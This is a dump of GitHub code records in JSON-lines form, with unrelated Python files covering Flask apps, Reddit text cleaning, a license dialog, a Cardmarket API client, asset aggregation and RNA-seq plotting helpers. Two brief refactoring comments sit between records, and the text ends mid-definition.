app.run(debug=True)","repo_name":"Shrirampareek888/Algorithmic-Investor","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
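Both routes in the Flask record above run the identical find-and-render sequence, differing only in the extra `updatecalled()` step. A minimal sketch, assuming the same Mongo collections and template, of how that duplication could be factored into a shared helper; `render_dashboard` is a hypothetical name, not part of the original app.py:

```python
import pymongo
from flask import Flask, render_template

app = Flask(__name__)
db = pymongo.MongoClient(host="localhost", port=27017).algoinvstr

def render_dashboard():
    # Single lookup-and-render step shared by every route.
    nifty = db.nifty.find_one()
    return render_template('index.html',
                           nifty=nifty["cur_val"],
                           nifty_high=nifty["all_time_high"],
                           change_per=nifty["down_per"],
                           mylist=db.toptwenty.find(),
                           time=nifty["time"],
                           date=nifty["date"])

@app.route('/')
def index():
    return render_dashboard()
```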
+{"seq_id":"35399565223","text":"import pandas as pd\nimport re\nfrom nltk.corpus import stopwords\nimport redditcleaner\n\n\ndef cleancsv(input_filepath, output_filepath):\n df = pd.read_csv(input_filepath, encoding='utf-8')\n\n #filtering out entries that have no text\n df = df[df['selftext'].notnull()]\n\n #filtering out entries that have no title\n df = df[df['title'].notnull()]\n\n #converting to time stamp and dropping unnecessary columns\n df['time_created'] = pd.to_datetime(df['created_utc'], unit='s')\n df = df.drop(columns = ['url', 'created_utc', 'created'])\n\n #removing rows that are deleted, removed, and blank comments\n df = df.loc[df['selftext'] != '[deleted]']\n df = df.loc[df['selftext'] != '[removed]']\n df = df.loc[df['selftext'] != '']\n\n #removing rows that are deleted, removed, and blank titles\n df = df.loc[df['title'] != '[deleted]']\n df = df.loc[df['title'] != '[removed]']\n df = df.loc[df['title'] != '']\n\n #processing text\n df['processed_text'] = df['selftext'].map(redditcleaner.clean)\n\n #removing blank comments\n df = df.loc[df['processed_text'] != '']\n\n #removing punctuation\n df['processed_text'] = df['processed_text'].map(lambda x: re.sub('[,;\\!?]', '', x))\n\n #removing any missed urls\n df['processed_text'] = df['processed_text'].map(lambda x: re.sub(r'(?:(?:http|https):\\/\\/)?([-a-zA-Z0-9.]{2,256}\\.[a-z]{2,4})\\b(?:\\/[-a-zA-Z0-9@:%_\\+.~#?&//=]*)?',\"\",x,flags=re.MULTILINE))\n \n #removing punctuation\n df['processed_text'] = df['processed_text'].map(lambda x: re.sub('[,;\\.!?]', '', x))\n\n #removing parentheses\n df['processed_text'] = df['processed_text'].map(lambda x: re.sub('[()]' ,'', x))\n\n #fixing apostrophes\n #df['processed_text'] = df['processed_text'].replace({\"’\" : \"'\"}, regex=True)\n\n #lowercasing all the words\n df['processed_text'] = df['processed_text'].map(lambda x: x.lower())\n\n #removing stopwords\n stop = stopwords.words('english')\n df['processed_text'] = df['processed_text'].apply(lambda x: ' '.join([item for item in str.split(x) if item not in stop]))\n\n #removing abbreviations\n df['processed_text'] = df['processed_text'].map(lambda x: re.sub('y/o' ,'year old', x))\n\n #removing posts that have any NAs or blank comments\n df = df.loc[df['processed_text'] != '']\n df = df.dropna()\n\n #---------------------------------------------------\n #---------------------------------------------------\n #now doing the same process for titles \n\n #processing text\n df['processed_title'] = df['title'].map(redditcleaner.clean)\n\n #removing blank comments\n df = df.loc[df['processed_title'] != '']\n\n #removing punctuation\n df['processed_title'] = df['processed_title'].map(lambda x: re.sub('[,;\\!?]', '', x))\n\n #removing any missed urls\n df['processed_title'] = df['processed_title'].map(lambda x: re.sub(r'(?:(?:http|https):\\/\\/)?([-a-zA-Z0-9.]{2,256}\\.[a-z]{2,4})\\b(?:\\/[-a-zA-Z0-9@:%_\\+.~#?&//=]*)?',\"\",x,flags=re.MULTILINE))\n \n #removing punctuation\n df['processed_title'] = df['processed_title'].map(lambda x: re.sub('[,;\\.!?]', '', x))\n\n #lowercasing all the words\n df['processed_title'] = df['processed_title'].map(lambda x: x.lower())\n\n #removing parentheses and brackets\n df['processed_title'] = df['processed_title'].map(lambda x: re.sub('[()]' ,'', x))\n df['processed_title'] = df['processed_title'].map(lambda x: re.sub('[\\[\\]]' ,'', x))\n\n #removing abbreviations\n df['processed_title'] = df['processed_title'].map(lambda x: re.sub('y/o' ,'year old', x))\n\n #removing posts that have any NAs or blank comments\n df = df.loc[df['processed_title'] != '']\n df = df.dropna()\n\n #removing stopwords\n stop = stopwords.words('english')\n df['processed_title_no_stop'] = df['processed_title'].apply(lambda x: ' '.join([item for item in str.split(x) if item not in stop]))\n\n #printing out the first 5 rows \n print(df.head())\n\n #printing to csv\n df.to_csv(output_filepath, index=False, encoding='utf-8-sig')\n\n\n\"\"\" \nRuns data processing scripts to turn raw data from (../raw) into\ncleaned data ready to be analyzed (saved in ../processed).\n\"\"\"\ndef main(input_filepath, output_filepath):\n \n cleancsv(input_filepath, output_filepath)\n\nif __name__ == '__main__':\n input_file = '../../data/raw/raw_reddit_scrape_3.csv'\n output_file = 
'../../data/processed/cleaned_reddit_data_3.csv'\n\n main(input_file, output_file)\n","repo_name":"vmmadathil/forums_aca_needs","sub_path":"src/data/make_dataset.py","file_name":"make_dataset.py","file_ext":"py","file_size_in_byte":4433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
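The `cleancsv` function above applies the same punctuation, URL, case, and stopword pipeline twice, once to `selftext` and once to `title`. A minimal sketch of folding that duplication into one parametrized helper; `clean_text_column` is a hypothetical name and the regex set is abbreviated from the original:

```python
import pandas as pd
from nltk.corpus import stopwords

def clean_text_column(df: pd.DataFrame, src: str, dest: str) -> pd.DataFrame:
    # One pass of the punctuation / case / stopword cleanup used for both
    # the post body and the title in the script above (abbreviated).
    stop = set(stopwords.words('english'))
    cleaned = (df[src]
               .str.replace(r'[,;\.!?()\[\]]', '', regex=True)
               .str.lower()
               .str.replace('y/o', 'year old', regex=False))
    df[dest] = cleaned.map(
        lambda s: ' '.join(w for w in s.split() if w not in stop))
    return df.loc[df[dest] != ''].dropna(subset=[dest])
```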
+{"seq_id":"73285344233","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom PySide6.QtWidgets import QDialog, QLabel\n\nfrom .license_dialog_ui import Ui_LicenseDialog\n\n\nsoftwares = [\n ('PySide6', '6.5.1', 'https://pypi.org/project/PySide6/', 'Commercial, GPLv2, LGPLv3', 'https://pypi.org/project/PySide6/'),\n # ('Paraview', '', 'https://www.paraview.org/', 'permissive BSD', 'https://www.paraview.org/license/'),\n ('ionicons', '', 'https://ionic.io/ionicons', 'Completely open source, MIT licensed', 'https://ionic.io/ionicons'),\n ('PyFoam', '2022.9', 'https://pypi.org/project/PyFoam', 'GPLv2+', 'https://pypi.org/project/PyFoam/'),\n ('h5py', '3.9.0', 'https://docs.h5py.org/en/stable/', 'h5py', 'https://docs.h5py.org/en/stable/licenses.html'),\n ('qasync', '0.24.0', 'https://pypi.org/project/qasync/', 'BSD', 'https://pypi.org/project/qasync/'),\n ('psutil', '5.9.5', 'https://pypi.org/project/psutil/', 'BSD', 'https://pypi.org/project/psutil/'),\n]\n\nclass LicenseDialog(QDialog):\n def __init__(self, widget):\n super().__init__(widget)\n self._ui = Ui_LicenseDialog()\n self._ui.setupUi(self)\n\n layout = self._ui.licenses.layout()\n row = 1\n for software, version, url, licence, licneceUrl in softwares:\n softwareLink = QLabel(f'<a href=\"{url}\">{software}</a>')\n softwareLink.setOpenExternalLinks(True)\n layout.addWidget(softwareLink, row, 0)\n licenceLink = QLabel(f'<a href=\"{licneceUrl}\">{licence}</a>')\n licenceLink.setOpenExternalLinks(True)\n layout.addWidget(licenceLink, row, 1)\n row += 1\n\n self._connectSignalsSlots()\n\n def _connectSignalsSlots(self):\n self._ui.close.clicked.connect(self.close)\n","repo_name":"nextfoam/baram","sub_path":"baramMesh/view/menu/help/license_dialog.py","file_name":"license_dialog.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"72"}
+{"seq_id":"70633343914","text":"from typing import Dict, List\n\nfrom canvas_workflow_kit import events\nfrom canvas_workflow_kit.canvas_code_set import CanvasCodeSet\nfrom canvas_workflow_kit.intervention import Intervention\nfrom canvas_workflow_kit.patient_recordset import InterviewRecordSet\nfrom canvas_workflow_kit.protocol import STATUS_DUE, STATUS_SATISFIED, ClinicalQualityMeasure, ProtocolResult\nfrom canvas_workflow_kit.recommendation import (\n Recommendation, ImmunizationRecommendation\n)\nfrom canvas_workflow_kit.timeframe import Timeframe\nfrom canvas_workflow_kit.value_set.specials import (\n Covid19QuestionnaireHighRiskOutreach,\n Covid19QuestionnaireSymptomaticSurveillance\n)\n\n\nfrom canvas_workflow_kit.value_set.v2018 import (\n InfluenzaVaccine_1254\n)\n\n# flake8: noqa\n\n\nclass HyperlinkRecommendation(ClinicalQualityMeasure):\n\n class Meta:\n title = 'Hyperlink Recommendation'\n version = \"1.2\"\n changelog = \"Initial release\"\n\n description = 'All patients with COVID Questionnaire completed Date < 7 days ago and > 5 days ago.'\n information = 'https://canvas-medical.zendesk.com/hc/en-us/articles/360059084173-COVID-19-Risk-Assessment-Follow-Up-Protocol'\n\n identifiers = ['CCP001v1']\n\n types = ['CCP']\n\n responds_to_event_types = [\n events.HEALTH_MAINTENANCE,\n ]\n authors = [\n 'Canvas Medical Team',\n ]\n\n compute_on_change_types = [\n ClinicalQualityMeasure.CHANGE_INTERVIEW,\n ]\n\n def compute_results(self) -> ProtocolResult:\n result = ProtocolResult()\n\n result.add_recommendation(\n Intervention(\n title='Link Rec Title',\n narrative=f'Link Rec Narr',\n href='http://canvasmedical.com'\n )\n )\n result.add_recommendation(\n ImmunizationRecommendation(\n key='KEY-ID',\n rank=123,\n button='ACT',\n patient=self.patient,\n immunization=InfluenzaVaccine_1254)\n )\n\n return result\n","repo_name":"dhes/canvas-workflow-kit-0.6.8","sub_path":"canvas_workflow_kit/builtin_cqms/hyperlink_recommendation.py","file_name":"hyperlink_recommendation.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"36261941750","text":"import gzip\nimport base64\nfrom lxml import etree\nfrom cardmarket_api.call import api_request\nfrom cardmarket_api.utils import dict_to_xml\n\n\nclass CardMarketSession:\n \"\"\"Create a session for specified account\"\"\"\n\n # 5000 requests per 24 hours max\n request_count = 0\n expires = None\n\n def __init__(self, mkm_app_token, mkm_app_secret, mkm_access_token, mkm_token_secret):\n self.credentials = {\"mkm_app_token\": mkm_app_token,\n \"mkm_app_secret\": mkm_app_secret,\n \"mkm_access_token\": mkm_access_token,\n \"mkm_token_secret\": mkm_token_secret}\n\n @api_request\n def get_metaproduct_info(self, metaproduct_id):\n \"\"\"Return info for metaproduct specified by id\"\"\"\n endpoint = \"/metaproduct/{0}\".format(metaproduct_id)\n data_type = \"metaproduct\"\n return {\"endpoint\": endpoint, \"data_type\": data_type}\n\n @api_request\n def get_product_info(self, product_id):\n \"\"\"Return info for product specified by id\"\"\"\n endpoint = \"/products/{0}\".format(product_id)\n data_type = \"product\"\n return {\"endpoint\": endpoint, \"data_type\": data_type}\n\n @api_request\n def get_products_by_name(self, card_name, exact=False, id_language=1):\n \"\"\"Return a list of product from card_name either in English or French.\n card_name has to be an exact match\n English idLanguage = 1\n French idLanguage = 2\"\"\"\n endpoint = \"/products/find\"\n parameters = {\"search\": card_name, \"exact\": exact, \"idGame\": 1, \"idLanguage\": id_language}\n return {\"endpoint\": endpoint, \"data_type\": \"product\", \"parameters\": parameters}\n\n @api_request\n def get_articles_for_sale(self, product_id):\n \"\"\"Return list of all articles for sale for a specified article\"\"\"\n endpoint = \"/articles/{0}\".format(product_id)\n data_type = \"article\"\n return {\"endpoint\": endpoint, \"data_type\": data_type}\n\n def get_all_products(self):\n \"\"\"Return binary list of all cardMarket products. 
Use 'wb' to write down\"\"\"\n gzip_file = self.get_all_products_file()\n data = gzip.decompress(base64.b64decode(gzip_file))\n return data\n\n @api_request\n def get_all_products_file(self):\n \"\"\"Return gzip file with all cardMarket products\"\"\"\n endpoint = \"/productlist\"\n data_type = \"productsfile\"\n return {\"endpoint\": endpoint, \"data_type\": data_type}\n\n @api_request\n def get_all_expansions(self):\n \"\"\"Return list of all expansions\"\"\"\n endpoint = \"/games/1/expansions\"\n return {\"endpoint\": endpoint}\n\n @api_request\n def get_wantlists(self):\n \"\"\"Return list of all wantLists of the account\"\"\"\n endpoint = \"/wantslist\"\n data_type = \"wantslist\"\n return {\"endpoint\": endpoint, \"data_type\": data_type}\n\n @api_request\n def get_cards_from_wantlist(self, id):\n \"\"\"Return list of cards from specified wantList by id\"\"\"\n endpoint = \"/wantslist/{0}\".format(id)\n data_type = \"want\"\n return {\"endpoint\": endpoint, \"data_type\": data_type}\n\n @api_request\n def get_shopping_cart(self):\n \"\"\"Return dict with shippingAddress, shoppingCart and account\"\"\"\n endpoint = \"/shoppingcart\"\n return {\"endpoint\": endpoint}\n\n @staticmethod\n def construct_xml(dict_list):\n \"\"\"Return MKM API valid binary string XML from a list of dict\n For empty SubElement set value to None type\"\"\"\n xml_tree = etree.Element(\"request\")\n [dict_to_xml(xml_tree, d) for d in dict_list]\n return etree.tostring(xml_tree, encoding='UTF-8', xml_declaration=True)\n\n\nif __name__ == \"__main__\":\n # Tests:\n\n print(cm.get_products_by_name(\"giant spider\"))\n print(cm.request_count)\n","repo_name":"NicolasCapon/cardmarket_api","sub_path":"cardmarket_api/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":3824,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"2767885388","text":"'''\ninputs: month, day, Daily_Temp, Daily_Precip, Daily_Humidity, Daily_Pressure, Daily_WindDir,\n Daily_WindSpeed, Daily_DNI, Daily_DHI\n\noutput: Daily_radiation\n'''\n\n# import modules\nfrom flask import Flask, jsonify, request\nimport pandas as pd\nimport joblib\nfrom app.preprocessing_functions import log_transform\n\napp = Flask(__name__)\n\n@app.route('/', methods=['GET', 'POST'])\ndef get_input():\n '''\n Flask script to interface between user request and ml model selected during POC \n '''\n # load packets\n packet = request.get_json(force=True)\n print(packet)\n\n # extract and reshape input data\n #input_data = list(packet.values())\n\n #print(input_data)\n\n # reshape data\n data = pd.DataFrame(packet, index=[0])\n\n print(data)\n\n # load the ml model\n model_path = 'app/rf_model.joblib'\n model = joblib.load(model_path)\n\n # generate prediction\n solar_irr = model.predict(data)[0]\n\n return jsonify(packet, {'Solar irradiation':solar_irr})","repo_name":"max-lutz/ML-tools-and-algorithms","sub_path":"MLOps/MLOps_course_Omdena/Solar_project/solar_app/app/flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"184196879","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport runner # noqa\n\nfrom core.testcase import TestCase, main\nfrom core.types import HyperCategory, Offer, Shop\nfrom core.matcher import Absent\n\n\nclass T(TestCase):\n @classmethod\n def prepare_pricedrops(cls):\n cls.index.shops += [\n Shop(fesh=20267000),\n 
Shop(fesh=20267001),\n Shop(fesh=20267002),\n Shop(fesh=20267003),\n Shop(fesh=20267004),\n ]\n\n cls.index.hypertree += [\n HyperCategory(hid=20267000),\n ]\n\n cls.index.offers += [\n Offer(title=\"offer1\", fesh=20267000, enable_auto_discounts=1, price=100000, price_history=None),\n Offer(\n title=\"offer2\",\n fesh=20267001,\n enable_auto_discounts=1,\n price=100000,\n price_old=150000,\n price_history=None,\n ),\n Offer(title=\"offer3\", fesh=20267002, enable_auto_discounts=1, price=100000, price_history=120000),\n Offer(\n title=\"offer4\",\n fesh=20267003,\n enable_auto_discounts=1,\n price=100000,\n price_old=150000,\n price_history=120000,\n ),\n Offer(title=\"offer5\", fesh=20267004, enable_auto_discounts=1, price=150000, price_history=120000),\n ]\n\n def test_autosale_no_disount_if_nothing_old(self):\n response = self.report.request_json('place=prime&fesh=20267000')\n self.assertFragmentIn(\n response,\n {\n \"titles\": {\"raw\": \"offer1\"},\n \"prices\": {\"value\": \"100000\", \"discount\": Absent()},\n },\n )\n\n def test_autosale_disount_if_only_history(self):\n response = self.report.request_json('place=prime&fesh=20267002')\n self.assertFragmentIn(\n response, {\"titles\": {\"raw\": \"offer3\"}, \"prices\": {\"value\": \"100000\", \"discount\": {\"percent\": 17}}}\n )\n\n def test_autosale_disount_if_oldprice_and_hprice(self):\n response = self.report.request_json('place=prime&fesh=20267003')\n self.assertFragmentIn(\n response, {\"titles\": {\"raw\": \"offer4\"}, \"prices\": {\"value\": \"100000\", \"discount\": {\"percent\": 17}}}\n )\n\n def test_drop_bad_autosale(self):\n response = self.report.request_json('place=prime&fesh=20267004')\n self.assertFragmentIn(\n response, {\"titles\": {\"raw\": \"offer5\"}, \"prices\": {\"value\": \"150000\", \"discount\": Absent()}}\n )\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"market/GENERAL/test_enable_auto_discounts.py","file_name":"test_enable_auto_discounts.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17302262227","text":"from itertools import groupby\nfrom enum import Enum\nimport copy\nfrom flaskr import typing\n\n\nclass AggregationType(str, Enum):\n pricing = 'p'\n name = 'n'\n\n\n# https://stackoverflow.com/questions/5884066/hashing-a-dictionary\ndef make_hash(o):\n \"\"\"\n makes a hash out of anything that contains only list,dict and hashable types including string and numeric types\n \"\"\"\n def _freeze(o):\n if isinstance(o, dict):\n return frozenset({ k:_freeze(v) for k,v in o.items()}.items())\n if isinstance(o, (list)):\n return tuple([_freeze(v) for v in o])\n\n return str(o)\n return hash(_freeze(o))\n\n\ndef _key(aggregationType: AggregationType):\n if aggregationType == AggregationType.pricing:\n return lambda a: make_hash([a['pricing'] if 'pricing' in a else None, a['currency']])\n if aggregationType == AggregationType.name:\n return lambda a: make_hash([a['name'], a['currency']])\n\n\ndef _filter(aggregationType: AggregationType):\n if aggregationType == AggregationType.pricing:\n return None\n if aggregationType == AggregationType.name:\n return lambda a: 'pricing' not in a\n\n\ndef _asList(o, key=None):\n if isinstance(o, dict):\n if key in o:\n return _asList(o[key])\n return []\n if isinstance(o, list):\n return o\n return [o]\n\n\ndef _merge(lhs, rhs):\n assert 'pricing' not in lhs or 'pricing' not in rhs or lhs['pricing'] == 
rhs['pricing']\n assert lhs['currency'] == rhs['currency']\n\n result = copy.deepcopy(lhs)\n\n result['_id'] = list(set(_asList(lhs, '_id') + _asList(rhs, '_id')))\n result['institution'] = list(set(_asList(lhs, 'institution') + _asList(rhs, 'institution')))\n\n result['operations'] = sorted(_asList(lhs, 'operations') + _asList(rhs, 'operations'), key=lambda op: op['date'])\n finalQuantity = 0\n for operation in result['operations']:\n if 'quantity' in operation:\n finalQuantity = typing.Operation.adjustQuantity(operation['type'], finalQuantity, operation['quantity'])\n operation['finalQuantity'] = finalQuantity\n\n result['finalQuantity'] = finalQuantity\n\n return result\n\n\ndef aggregate(assets, type: AggregationType):\n filt = _filter(type)\n ignored = []\n if filt:\n assetsSorted = sorted(assets, key=filt)\n for key, group in groupby(assetsSorted, filt):\n if key:\n assets = list(group)\n else:\n ignored = list(group)\n\n key = _key(type)\n assets = sorted(assets, key=key)\n\n pos = 0\n while pos < len(assets)-1:\n if key(assets[pos]) != key(assets[pos+1]):\n pos += 1\n continue\n\n assets[pos] = _merge(assets[pos], assets[pos+1])\n del assets[pos+1]\n\n return ignored + assets\n","repo_name":"kpk-pl/wallet","sub_path":"web-gui/flaskr/analyzers/aggregate.py","file_name":"aggregate.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12849935446","text":"def duplicate_number(arr):\n \"\"\"\n :param - array containing numbers in the range [0, len(arr) - 2]\n return - the number that is duplicate in the arr\n \n numbers_dict = dict()\n result = 0\n for digit in arr:\n if numbers_dict.get(digit, 0) == 0:\n numbers_dict[digit] = 1\n elif numbers_dict[digit] == 1:\n numbers_dict[digit] = 2\n result = digit\n break\n \n return result\n \"\"\"\n current_sum = 0\n expected_sum = 0\n \n for num in arr:\n current_sum += num\n\n for i in range(len(arr) - 1):\n expected_sum += i\n \n return current_sum - expected_sum\n\ndef test_function(test_case):\n arr = test_case[0]\n solution = test_case[1]\n output = duplicate_number(arr)\n if output == solution:\n print(\"Pass\")\n else:\n print(\"Fail\")\n\narr = [0, 0]\nsolution = 0\n\ntest_case = [arr, solution]\ntest_function(test_case)\n\narr = [0, 2, 3, 1, 4, 5, 3]\nsolution = 3\n\ntest_case = [arr, solution]\ntest_function(test_case)\n\narr = [0, 1, 5, 4, 3, 2, 0]\nsolution = 0\n\ntest_case = [arr, solution]\ntest_function(test_case)\n\narr = [0, 1, 5, 5, 3, 2, 4]\nsolution = 5\n\ntest_case = [arr, solution]\ntest_function(test_case)\n\narr = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 11]\nsolution = 11\n\ntest_case = [arr, solution]\ntest_function(test_case)","repo_name":"marcotello/PythonPractices","sub_path":"DataStrucutures/Arrays/duplicate_numbers.py","file_name":"duplicate_numbers.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15211351945","text":"#module for storing RNA-Seq pipeline auxiliary functions\nimport sys\n#1) Imports, this relies on utils keeping same relative path\nutil_dir = '../../common_scripts/pipe_utils/'\nsys.path.append(util_dir)\nfrom import_file import *\nimport matplotlib.ticker as plticker\n\ndef get_fasta(infasta, outfasta, write_all = True, get_chr = None):\n '''\n Given a multifasta, split into individual files.\n Can be useful for testing tools.\n If get_chr != None, will write a matching fasta. 
Otherwise will write all.\n #also see notebook C2.19c\n '''\n records = SeqIO.to_dict(SeqIO.parse(infasta, \"fasta\"))\n\n for k in records:\n records[k].name = ''\n records[k].description = ''\n\n with open(outfasta, 'w') as g:\n for k in records:\n SeqIO.write(records[k], g, 'fasta')\n\ndef test_plot():\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.scatter(range(0, 10), range(0, 10), color = 'k', s = 10)\n #ax.text(0.1, 0.8, 'r2 = %1.3f\\nn = %s' % (r2_val, num_plotted), transform = ax.transAxes)\n plt.savefig('testplot.png')\n plt.close(fig)\n\n #label_axes(ax, xname = xname, yname = yname, label_index_level = label_index_level, axis_title_suffix = axis_title_suffix)\n return fig\n #return {'num_plotted': num_plotted, 'fig': fig, 'ax': ax}\n\n\ndef remove_spikeins(df, spikenames = ['ERCC', 'SIRV']):\n '''\n Remove all rows with index starting with spikein names, e.g. ERCC and SIRV\n '''\n all_txts = set(df.index.values)\n allspike = set()\n for s in spikenames:\n geneset = set([i for i in all_txts if i.startswith(s)])\n allspike = allspike | geneset\n\n #Remove ERCC and SIRV genes from dataset as we don't want to plot these for gene reproducibility\n df.drop(labels = allspike, inplace = True)\n\ndef quick_barplot(df, cols = None, label_index_level = None, axis_title_suffix = '', title = '', limits = None, ticklabels = None, **kwargs):\n '''\n Make quick barplot to summarize count data,\n for example from the spike-in or rRNA-mapping reads\n Input:\n a dataframe (df) containing y_col values to plot, x_col ids\n divide_by = a number which all values in y_col will be divided by\n percent = convert fraction to percent for plotting\n '''\n #normalize values, this will change the col_to_plot\n x_col, y_col = cols[0:]\n col_to_plot = y_col\n if kwargs['divide_by'] != 1:\n df['frac'] = df[y_col]/kwargs['divide_by']\n col_to_plot = 'frac'\n\n if kwargs['percent'] == True:\n df['percent'] = df['frac']*100\n col_to_plot = 'percent'\n\n height = 4\n width_ratio = len(df)/16\n width = height*width_ratio\n if width < 4:\n width = 4\n fig = plt.figure(figsize = (width, height))\n ax = fig.add_subplot(111)\n ax = sns.barplot(data = df, x = x_col, y = col_to_plot, ax = ax)\n #just using text.set_rotation(45) doesn't allow you to align wrt the axis\n xlabels = df[x_col]\n #lining the right side of text box up with tick looks best of options, still not great\n ax.set_xticklabels(xlabels, rotation = 45, ha = 'right')\n plt.tight_layout()\n\n return {'df':df, 'fig': fig, 'ax': ax}\n\ndef stacked_bar(df, cols = None, label_index_level = None, axis_title_suffix = '', title = '', limits = None, ticklabels = None, **kwargs):\n #this scales the width of the bars but the legend is still plotted on top of the bars\n #normalize values, this will change the col_to_plot\n x_col = cols[0]\n y_cols = cols[1:]\n\n width = 4\n height = 4\n fig = plt.figure(figsize = (width, height))\n ax = fig.add_subplot(111)\n\n sns.barplot(data = df, x = x_col, y = y_cols[0], color = 'red', ax = ax)\n #need to pass 'cat_labels' to kwargs in order of cols\n bars = [plt.Rectangle((0,0),1,1,fc=\"red\", edgecolor = 'none')]\n for i in range(1, len(y_cols)):\n bottom_plot = sns.barplot(data = df, x = x_col, y = y_cols[i], color = 'blue', ax = ax)\n bars.append(plt.Rectangle((0,0),1,1,fc='#0000A3', edgecolor = 'none'))\n\n l = plt.legend(bars, kwargs['cat_labels'], loc = (1.04, 0.75), prop={'size':16})\n l.draw_frame(False)\n return {'fig': fig, 'ax': ax, 'bars':bars, 'extra_artists': [l]}\n\ndef plot_genomic_region(coverage, chrom, 
start, end, strand, positions = None):\n '''\n Given a genomic region and coverage HTSeq GA, plot reads mapping to that region\n [start, end) 0-based\n Also and option to pass a postion file which will then mark regions that overlap with those positions\n '''\n window = HTSeq.GenomicInterval(chrom, start, end, strand)\n wincvg = np.fromiter(coverage[window], dtype='i')\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(range(start, end), wincvg)\n ax.xaxis.set_major_formatter(FormatStrFormatter('%.0f'))\n ax.set_ylim(bottom=0)\n ax.set_xlim(start, end)\n plt.xticks(rotation=45)\n ax.set_ylabel('read counts')\n ax.set_xlabel('position')\n\n return ax\n\ndef limit_df(df, colnames = None, min_val = None, max_val = None):\n '''\n Filter out data that is outside given min and max values\n '''\n\n for col in colnames:\n df = df[df[col].between(min_val, max_val, inclusive = True)].copy()\n\n df.dropna(subset = colnames, inplace = True)\n\n return df\n\ndef clean_df(df, cols = None):\n '''\n Replace inf values with nan & drop nan-containing rows over given columns\n This needs to be done before analysis and/or after log-transform\n '''\n #print('cleaning')\n df.replace([np.inf, -np.inf], np.nan, inplace = True)\n df.dropna(axis = 0, how = 'any', subset = cols, inplace = True)\n\ndef cdf_plot(df, x_col = None, bg_group = 'all', group_col = None, nbins = 100, x_label = None, y_label = None, filename = None, logbase = None, title = None):\n '''\n Plot data in given column and a group_by variable as CDF\n x_col = the name of the column containing the data\n group_col = the name of the column containing the classification variable, e.g. short, long\n nbins = number of bins to use\n '''\n fig = plt.figure(figsize = (8, 8))\n ax = fig.add_subplot(111)\n\n groups = df[group_col].unique()\n groups = sorted(groups)\n\n #bring bg group to front if we are not using a specific bg group\n if bg_group != 'all':\n groups.insert(0, groups.pop(groups.index(bg_group)))\n first_df = None\n #build first df from first group\n #otherwise the first group will be the whole dataset, named 'all'\n else:\n groups.pop(groups.index('bg'))\n groups.insert(0, 'all')\n first_df = df\n\n all_bins = []\n all_cdfs = []\n handles = []\n labels = []\n\n for i in range(0, len(groups)):\n if i == 0:\n if first_df is not None:\n sub_df = first_df\n else:\n sub_df = df[df[group_col] == groups[i]].copy()\n else:\n sub_df = df[df[group_col] == groups[i]].copy()\n\n data = sub_df[x_col]\n counts, bin_edges = np.histogram(data, bins = nbins, normed = True)\n cdf = np.cumsum(counts)\n all_cdfs.append(cdf)\n all_bins.append(bin_edges)\n l, = plt.plot(bin_edges[1:], cdf/cdf[-1])\n handles.append(l)\n\n if i == 0:\n if bg_group != 'all':\n bg_data = data\n else:\n bg_data = df[x_col]\n labels.append('{:}, n={:}'.format(groups[i], len(data)))\n else:\n stat, pval = sp.stats.ks_2samp(bg_data, data)\n labels.append('{:}, n={:}, p={:.2E}'.format(groups[i], len(data), Decimal(pval)))\n\n plt.legend(handles, labels)\n\n #ax.text(0.1, 0.9, 'r2 = %1.3f\\nn = %s' % (r2_val, num_plotted), transform = ax.transAxes, fontsize = 12)\n ax.set_xlabel(x_label)\n ax.set_ylabel(y_label)\n plt.title(title)\n if filename != None:\n plt.savefig('%s.png' % filename)\n plt.close(fig)\n else:\n return ax\n\ndef barhist_plot(df, cols = None, label_index_level = None, axis_title_suffix = '', filename = None, title = '', limits = None, ticklabels = None):\n '''\n Make histogram with bars\n I think this is currently only compatible with plotting a single histogram on 
the axis\n '''\n #mu = np.median(to_plot_x)\n #sigma = np.std(to_plot_x)\n normed = False\n\n fig = plt.figure(figsize = (8,8))\n ax = fig.add_subplot(111)\n # the histogram of the data\n ##n, bins, patches = plt.hist(df[cols], 100, normed=normed, facecolor='blue', alpha=0.8, histtype = 'bar')\n\n # add a 'best fit' line\n #y = mlab.normpdf( bins, mu, sigma)\n nbins = 100\n ax.hist(df[cols], bins = nbins)\n ##ax = plt.plot(bins, patches, 'r--', linewidth=1)\n return {'ax': ax}\n\ndef barhist_plot2(df, cols = None, label_index_level = None, axis_title_suffix = '', title = ''):\n '''\n Make histogram with bars plus a fitted normal curve\n I think this is currently only compatible with plotting a single histogram on the axis\n '''\n mu = np.median(df[cols])\n sigma = np.std(df[cols])\n\n # the histogram of the data, density-normalized so the fitted curve is on the same scale\n n, bins, patches = plt.hist(df[cols], 100, normed=True, facecolor='blue', alpha=0.8, histtype = 'bar')\n\n # add a 'best fit' line (sp.stats.norm.pdf stands in for the removed mlab.normpdf)\n y = sp.stats.norm.pdf(bins, mu, sigma)\n\n ax = plt.plot(bins, y, 'r--', linewidth=1)\n return {'ax': ax}\n\ndef 